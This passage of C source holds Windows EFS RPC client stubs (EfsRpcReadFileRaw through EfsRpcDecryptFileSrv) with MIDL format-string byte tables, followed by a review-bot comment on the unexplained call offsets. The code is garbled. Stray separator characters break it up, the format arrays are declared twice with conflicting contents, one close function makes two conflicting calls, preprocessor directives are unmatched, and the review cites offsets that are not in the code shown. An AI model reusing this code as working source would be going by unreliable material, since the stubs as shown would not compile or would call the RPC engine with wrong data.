return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 0, &binding_h).Simple;
|
||||
}
|
||||
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe)
|
||||
{
|
||||
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 52, &hContext).Simple;
|
||||
}
|
||||
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe)
|
||||
{
|
||||
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 100, &hContext).Simple;
|
||||
}
|
||||
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext)
|
||||
{
|
||||
NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[52], (unsigned char *) &hContext);
|
||||
NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 148, &hContext);
|
||||
}
|
||||
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName)
|
||||
{
|
||||
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 184, &binding_h).Simple;
|
||||
}
|
||||
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag)
|
||||
{
|
||||
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 224, &binding_h).Simple;
|
||||
}
|
||||
#pragma warning(pop)
|
||||
#pragma optimize("", on)
|
||||
static const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString = {0, {
|
||||
const UCHAR ms2Defsr__MIDL_ProcFormatString[] = {
|
||||
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01, 0x04, 0x00,
|
||||
0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x04, 0x00, 0x30, 0xe0,
|
||||
0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x12, 0x00, 0x00,
|
||||
}};
|
||||
static const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString = {0, {
|
||||
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
|
||||
}};
|
||||
#endif
|
||||
0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0c, 0x00, 0x30, 0x40,
|
||||
0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x14, 0x41, 0x04, 0x00, 0x18, 0x00, 0x70, 0x00,
|
||||
0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0c, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x0c, 0x01, 0x04, 0x00, 0x26, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x04, 0x00, 0x30, 0xe0,
|
||||
0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x32, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
|
||||
0x0c, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x46, 0x02, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x04, 0x00, 0x0c, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00,
|
||||
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x10, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x08, 0x00, 0x46, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x04, 0x00,
|
||||
0x0c, 0x00, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, 0x70, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x00,
|
||||
};
|
||||
#endif
|
||||
const UCHAR ms2Defsr__MIDL_TypeFormatString[] = {
|
||||
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x30, 0x41, 0x00, 0x00, 0x11, 0x04, 0x04, 0x00, 0x02, 0x5c, 0xb5, 0x00, 0xfc, 0xff, 0x01, 0x00, 0x01, 0x00,
|
||||
0x11, 0x00, 0x04, 0x00, 0x02, 0x5c, 0xb5, 0x00, 0xfc, 0xff, 0x01, 0x00, 0x01, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
|
||||
};
|
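Review bot: The offsets handed to `NdrClientCall2` (`+ 54`, `+ 104`, `+ 154`, `+ 192`, `+ 234` in the x64 stubs and `+ 52`, `+ 100`, `+ 148`, `+ 184`, `+ 224` in the x86 ones) are bare numbers with nothing tying them to the byte tables they index. Each one has to land on the start of a procedure description inside `ms2Defsr__MIDL_ProcFormatString`; a wrong value would make the NDR engine read unrelated bytes as a procedure header. A short comment per stub, e.g. `// offset of this call's procedure description in ms2Defsr__MIDL_ProcFormatString (differs per architecture)`, or named constants next to each table, would make the pairing reviewable. The x86 stubs also pass `&binding_h` / `&hContext` as the argument block, which relies on the parameters staying contiguous on the stack. The `#pragma optimize("", off)` around them deserves a one-line comment saying that this is why optimization is disabled there.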